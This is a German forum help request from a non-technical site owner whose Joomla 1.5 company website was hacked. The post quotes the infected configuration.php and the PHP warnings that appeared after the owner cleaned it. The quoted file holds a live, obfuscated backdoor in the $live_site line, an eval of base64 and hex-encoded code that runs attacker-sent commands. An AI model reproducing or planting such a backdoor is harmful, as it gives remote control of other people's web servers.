Hallo alle miteinander,
Ich habe unserer Firma eine kleine Webseite aufgesetzt. Ich bin weder Programmierer noch habe ich etwas mit IT zu tun, sondern komme aus der Steuer/Unternehmensberatung - daher bin ich hiermit schon so ziemlich gefordert was das IT-Wissen angeht 
Jedenfalls wurde Joomla 1.5 verwendet, ich glaube es war 1.5.22. Nichts besonderes, einfach mit ein paar Texten und Bildern. So. Das Joomla hab ich aufsetzen können. Die Seite wird nicht oft besucht, sollte eigentlich nur ein bißchen über unserem Team und der Firma erzählen. Daher fiel ich fast vom Hocker als ich heute eine leere Seite vor mir sah.
Habe gleich bei unserem Hostingprovider domainfactory.eu angerufen und ein Mitarbeiter meinte ich solle mir mal die configuration.php anschauen - die Seite wurde seiner Ansicht nach mit großer Wahrscheinlichkeit gehackt 
Hier die gehackte configuration.php (einige Stellen anonymisiere ich mit XXYYXXYY):
PHP-Code:
<?php
class JConfig {
var $offline = '0';
var $editor = 'jce';
var $list_limit = '100';
var $helpurl = 'http://help.joomla.org';
var $debug = '0';
var $debug_lang = '0';
var $sef = '0';
var $sef_rewrite = '0';
var $sef_suffix = '0';
var $feed_limit = '20';
var $feed_email = 'author';
var $secret = 'fic7PzFbETkstLxf';
var $gzip = '0';
var $error_reporting = '-1';
var $xmlrpc_server = '0';
var $log_path = '/kunden/27YYXX_1010/webseiten/XXYYXXYY/logs';
var $tmp_path = '/kunden/27YYXX_1010/webseiten/XXYYXXYY/tmp';
var $live_site ='\';function __construct() { preg_replace(\"/.+/esi\",\"\\x65\\x76\\x61\\x6C\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28\'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkgeyAkZD1iYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCcgJywnKycsJF9QT1NUWydjJ10pKTtpZigkZCkgZXZhbCgkZCk7fQ0KZWNobyAnPG5hbWU9Yz48L3RleHRhcmVhPic7ZXhpdDt9\'\\x29\\x29\\x3B\",\'1\');}#://';# '';
var $force_ssl = '0';
var $offset = '1';
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
var $memcache_settings = array();
var $ftp_enable ='0';# '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $dbtype = 'mysql';
var $host = 'mysql4.XXYYXXYYXXYY.com';
var $user = 'db27XXYYXXYY';
var $db = 'db27XXYYXXYY_1';
var $dbprefix = 'jos_';
var $mailer = 'mail';
var $mailfrom = 'admin@admin.com';
var $fromname = 'XXYYXXYY';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
var $MetaAuthor = '1';
var $MetaTitle = '1';
var $lifetime = '15';
var $session_handler = 'database';
var $password = 'XXYYXXYY';
var $sitename = '';
var $MetaDesc = 'XXYYXXYY';
var $MetaKeys = 'XXYYXXYY';
var $offline_message = 'Diese Website ist zurzeit im Wartungsmodus. Bitte besuchen Sie uns später noch ein Mal.';
}
?>
Dabei ist mir gleich diese Zeile hier aufgefallen: var $live_site =
Gut, ich habe nun den ganzen Schmarrn oben hinausgelöscht und wie folgt korrigiert:
PHP-Code:
var $live_site ='';
Jetzt ist die Webseite wieder erreichbar, aber:- Erscheinen über der Website im Browser 6 unschöne Fehlermeldungen
- Die Schriftgrößen sind anders (CSS verschossen?)
- Komme ich nicht mehr ins Backend.
Zum ersten Punkt hier die Fehlermeldungen:
HTML-Code:
<b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /kunden/2XXYY_1010/webseiten/XXYY/configuration.php:1) in <b>/kunden/2XXYY_1010/webseiten/XXYY/libraries/joomla/session/session.php</b> on line <b>423</b><br />
<br />
<b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /kunden/2XXYY_1010/webseiten/XXYY/configuration.php:1) in <b>/kunden/2XXYY_1010/webseiten/XXYY/libraries/joomla/session/session.php</b> on line <b>423</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /kunden/2XXYY_1010/webseiten/XXYY/configuration.php:1) in <b>/kunden/2XXYY_1010/webseiten/XXYY/libraries/joomla/session/session.php</b> on line <b>426</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /kunden/2XXYY_1010/webseiten/XXYY/configuration.php:1) in <b>/kunden/2XXYY_1010/webseiten/XXYY/plugins/system/jfrouter.php</b> on line <b>316</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /kunden/2XXYY_1010/webseiten/XXYY/configuration.php:1) in <b>/kunden/2XXYY_1010/webseiten/XXYY/plugins/system/jfrouter.php</b> on line <b>317</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /kunden/2XXYY_1010/webseiten/XXYY/configuration.php:1) in <b>/kunden/2XXYY_1010/webseiten/XXYY/plugins/system/jfrouter.php</b> on line <b>318</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" >
<head>
<meta **********="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="XXYY" />
<meta name="title" content="Willkommen bei XXYY" />
Ich möchte eigentlich nur
-wieder ins Backend kommen und
-dass es die Seite ohne die Fehlermeldungen anzeigt.
Das CSS im Nachhinein zu ändern ist dann nicht mehr so schwer. Hat jemand eine Ahnung wie ich hier weiter vorgehen soll?
Vielen Dank im Voraus,
Viktor
LinkBack URL
About LinkBacks
Joomla 1.5 gehacked - Versuche die Seite wiederherzustellen [Help]
Zitieren
Lesezeichen